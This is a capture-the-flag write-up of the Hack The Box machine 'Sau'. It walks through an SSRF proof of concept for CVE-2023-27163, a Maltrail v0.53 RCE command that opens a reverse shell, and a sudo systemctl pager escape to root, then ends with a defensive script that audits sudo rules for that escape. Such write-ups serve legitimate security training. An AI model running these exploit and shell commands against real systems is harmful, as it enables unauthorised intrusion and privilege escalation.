Key points
- Exploitation of CVE-2023-27163
- systemd privilege escalation
Steps
Run an nmap scan; port 55555 is the one to look at first.
Nmap scan report for 10.10.11.224
Host is up (0.58s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
Opening the page, the software name and version are shown in the bottom-left corner.
Searching for it turns up many exploits; the one used here is GitHub - entr0pie/CVE-2023-27163: Proof-of-Concept for Server Side Request Forgery (SSRF) in request-baskets (<= v.1.2.1). After a quick look, this CVE allows request-baskets to forward requests to an arbitrary destination, so here the request is forwarded to port 80 on the server side (the 127.0.0.1 actually ends up in the request-baskets entry configuration, i.e. it points to the server itself).
C:\home\kali\Documents\HTB\Sau\CVE-2023-27163-main> ./CVE-2023-27163.sh http://10.10.11.224:55555 http://127.0.0.1:80
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163
> Creating the "fduqgd" proxy basket...
> Basket created!
> Accessing http://10.10.11.224:55555/fduqgd now makes the server request to http://127.0.0.1:80.
> Authorization: hCArIkTJn2301CJdww6xq016yCcKlEucytDR3lL3wKGk
Opening http://10.10.11.224:55555/fduqgd then shows a Maltrail v0.53 page.
That version of Maltrail has an RCE vulnerability: https://github.com/spookier/Maltrail-v0.53-Exploit
After downloading it, running the following command creates a reverse shell:
python exploit.py 10.10.16.19 80 http://10.10.11.224:55555/fduqgd
Running sudo -l reveals the lead: /usr/bin/systemctl
puma@sau:~$ sudo -l
sudo -l
Matching Defaults entries for puma on sau:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User puma may run the following commands on sau:
(ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
Following Sudo Systemctl Privilege Escalation | Exploit Notes here gives a successful privilege escalation.
sudo /usr/bin/systemctl status trail.service
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!//bbiinn//bbaasshh!/bin/bash
root@sau:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
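The root cause of the last step is that `systemctl status` pipes its output through a pager when stdout is a terminal, and the pager's `!` escape runs a shell as the sudo run-as user. As an added example (not part of the original write-up), the following script audits `sudo -l` rule lines for that pattern; the parser is a constructed, simplified one that handles the `(runas) TAG: command` form shown above, not the full sudoers grammar, and the sample rules are constructed from the write-up.

```python
import re
import shlex

# Binaries that pipe their output through a pager (less by default) when stdout
# is a terminal. Inside the pager, `!cmd` spawns a shell, which under sudo runs
# as the run-as user; that is what the `!/bin/bash` line in the write-up does.
PAGING_BINARIES = {"systemctl", "journalctl"}
SAFE_FLAG = "--no-pager"

# Matches one `sudo -l` rule line: "(runas) TAG1: TAG2: /path/to/cmd args".
RULE_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_rule(line):
    """Parse one rule line into (runas, tags, argv); None if it is not a rule."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    runas, tag_blob, command = m.groups()
    tags = [t.rstrip(":") for t in tag_blob.split()]
    return runas.strip(), tags, shlex.split(command)


def audit_rule(line):
    """Return a finding for a rule that hands the user a pager, else None."""
    parsed = parse_rule(line)
    if parsed is None:
        return None
    runas, _tags, argv = parsed
    if not argv:
        return None
    binary = argv[0].rsplit("/", 1)[-1]
    if binary not in PAGING_BINARIES or SAFE_FLAG in argv[1:]:
        return None
    fixed = " ".join([argv[0], SAFE_FLAG] + argv[1:])
    return (f"{binary} runs as ({runas}) without {SAFE_FLAG}: the pager's '!' "
            f"escape yields a shell as that user; use: {fixed}")


def audit_sudo_l(output):
    """Audit every line of captured `sudo -l` output; returns a list of findings."""
    return [f for f in (audit_rule(l) for l in output.splitlines()) if f]


# Constructed sample: the rule from the write-up plus a hardened variant.
SAMPLE = """\
User puma may run the following commands on sau:
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service
    (ALL : ALL) NOPASSWD: /usr/bin/systemctl --no-pager status trail.service
"""
```

Running `audit_sudo_l(SAMPLE)` flags only the first rule and suggests the `--no-pager` form; because the rule has `env_reset`, the user cannot work around the pager with `SYSTEMD_PAGER`, so the fix belongs in the sudoers rule itself.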